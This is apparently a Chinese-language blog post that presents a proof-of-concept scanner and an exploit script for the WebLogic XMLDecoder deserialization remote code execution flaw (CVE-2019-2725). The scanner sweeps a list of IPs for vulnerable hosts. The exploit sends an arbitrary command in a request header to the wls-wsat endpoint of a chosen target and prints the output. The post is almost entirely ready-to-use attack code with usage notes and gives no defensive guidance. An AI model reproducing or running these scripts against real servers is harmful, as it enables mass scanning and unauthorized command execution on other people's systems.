Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过

主要来还是懒  废话不多说直接上exp和poc 吧  poc并不通用 更多用exp吧 

IP填入ip.txt 后用poc检测

POC

 import requests
import sys
import time
import random
import threading
def exec_cmd(ip,cmd):
 url="http://"+ip+"/wls-wsat/CoordinatorPortType11"
 headers={
 'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
 'CMD' : cmd,
 'SOAPAction':'""',
 'Content-Type':'text/xml'
 }
 with open('payload.txt','rb') as f :
 payloads=f.read()
 r=requests.post(url,headers=headers,data=payloads,timeout=5)
 return r.content.decode()
def test_poc(ip):
 check=str(int(time.time())+int(random.uniform(1000,9999)))
 out=exec_cmd(ip,'echo '+check)
 if check in out:
 print('vul finds:'+ip)
def main(): 
 print("put ips in ip.txt ")
 with open('ip.txt') as f:
 for line in f.readlines():
 try:
 test_poc(line)
 except :
 pass
 print("End") 
if __name__ == '__main__':
 main()。 

exp

import requests
import sys
def exec_cmd(ip,cmd):
	url="http://"+ip+"/wls-wsat/CoordinatorPortType11"
	headers={
	'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
	'CMD' : cmd,
	'SOAPAction':'""',
	'Content-Type':'text/xml'
	}
	with open('payload.txt','rb') as f :
		payloads=f.read()
	r=requests.post(url,headers=headers,data=payloads)
	return r.content.decode()
def main():
	if len(sys.argv)<3:
		print('usage:exp.py www.0dayhack.com:8080 whoami')
		sys.exit()
	ip=sys.argv[1]
	cmd=sys.argv[2]
	out=exec_cmd(ip,cmd)
	print(out)
if __name__ == '__main__':
	main()
exp2.png

注意:

只支持Py3

ip.txt是放检测的

人已赞赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧